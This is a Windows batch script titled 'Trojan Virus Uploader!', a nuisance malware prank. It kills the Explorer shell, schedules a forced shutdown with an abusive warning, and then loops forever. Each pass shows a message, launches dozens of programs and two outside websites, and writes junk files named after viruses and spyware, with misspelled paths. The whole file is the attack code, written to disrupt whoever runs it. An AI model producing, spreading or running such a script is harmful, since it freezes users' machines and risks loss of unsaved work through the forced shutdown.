@echo off
title Trojan Virus Uploader!
taskkill /f /im explorer.exe
cls
shutdown.exe -s -t 420 -c "Trojan Horse has been Downloaded! Your Computer is Fucked!"
cls
:a
msg * Trojan Horse has been Downloaded! Your Computer is Fucked!
start cmd.exe
start wab.exe
start magnify.exe
start sndrec32.exe
start sndvol32.exe
start msmsgs.exe
start osk.exe
start utilman.exe
start moviemk.exe
start mspaint.exe
start YahooMessenger.exe
start mshearts.exe
start freecell.exe
start wordpad.exe
start sol.exe
start winmine.exe
start http://twiztedsdumps.fileave.com/
start http://wowomg.org
start notepad.exe
start spider.exe
start calc.exe
start PINBALL.EXE
start iexplorer.exe
echo C:\Dociments and Settings\Desktop>Trojan Virus!
echo C:\Dociments and Settings\Desktop>Trojan Virus
echo C:\Dociments and Settings\Desktop>Worm
echo C:\Dociments and Settings\Desktop>Worm!
echo C:\Dociments and Settings\Desktop>Spyware 12
echo C:\Dociments and Settings\Desktop>Spyware 14
echo C:\Dociments and Settings\Desktop>Spyware 13
echo C:\Dociments and Settings\Desktop>Spyware 11
echo C:\Dociments and Settings\My Computer>Trojan Virus
echo C:\Dociments and Settings\My Computer>Trojan Virus!
echo C:\Dociments and Settings\My Computer>Worm
echo C:\Dociments and Settings\My Computer>Worm!
echo C:\Dociments and Settings\My Computer>Spyware 12
echo C:\Dociments and Settings\My Computer>Spyware 14
echo C:\Dociments and Settings\My Computer>Spyware 13
echo C:\Dociments and Settings\My Computer>Spyware 11
loop
goto :a